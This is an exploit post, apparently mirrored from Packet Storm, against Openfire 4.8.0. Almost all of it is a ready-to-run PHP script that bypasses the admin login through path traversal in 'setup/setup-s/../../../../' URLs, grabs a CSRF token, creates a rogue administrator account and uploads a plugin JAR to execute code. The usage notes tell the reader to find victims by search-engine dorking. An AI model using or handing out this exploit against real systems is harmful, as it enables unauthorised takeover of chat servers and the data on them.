Openfire 4.8.0 Code Injection
2024-10-11 23:1:47 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title : Openfire release 4.8.0 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.igniterealtime.org/projects/openfire/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 115 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class OpenfireExploit
{
private $targetUrl;
private $adminUsername;
private $adminPassword;
private $pluginName;
private $csrfToken;

public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)
{
$this->targetUrl = rtrim($targetUrl, '/') . '/';
$this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);
$this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);
$this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);
}

private function generateRandomString($minLength, $maxLength)
{
$length = rand($minLength, $maxLength);
return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);
}

private function generateRandomPassword($minLength, $maxLength)
{
return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));
}

private function sendRequest($method, $uri, $data = null, $headers = [])
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

return curl_exec($ch);
}

private function getCsrfToken()
{
$response = $this->sendRequest('GET', 'login.jsp');
preg_match('/csrf=([^;]+)/', $response, $matches);
return $matches[1] ?? null;
}

private function authBypass()
{
$this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');
// Check if we can access the user-groups.jsp page
return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;
}

private function addAdminUser()
{
$this->csrfToken = $this->getCsrfToken();

$data = http_build_query([
'csrf' => $this->csrfToken,
'username' => $this->adminUsername,
'password' => $this->adminPassword,
'passwordConfirm' => $this->adminPassword,
'isadmin' => 'on',
'create' => 'Create User'
]);

return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);
}

private function uploadPlugin($pluginFilePath)
{
$this->csrfToken = $this->getCsrfToken();

$cfile = new CURLFile($pluginFilePath);
$data = [
'uploadfile' => $cfile,
'csrf' => $this->csrfToken
];

$headers = ['Content-Type: multipart/form-data'];
return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);
}

public function exploit()
{
if ($this->authBypass()) {
echo "Authentication bypass successful.\n";

if ($this->addAdminUser()) {
echo "Admin user '{$this->adminUsername}' added successfully.\n";

// Prepare plugin JAR file path
$pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file

if ($this->uploadPlugin($pluginJarPath)) {
echo "Plugin uploaded successfully.\n";
} else {
echo "Failed to upload plugin.\n";
}
} else {
echo "Failed to add admin user.\n";
}
} else {
echo "Authentication bypass failed.\n";
}
}
}

// Usage
$exploit = new OpenfireExploit('http://target-openfire-url.com');
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/182155/openfire480-exec.txt
如有侵权请联系:admin#unsafe.sh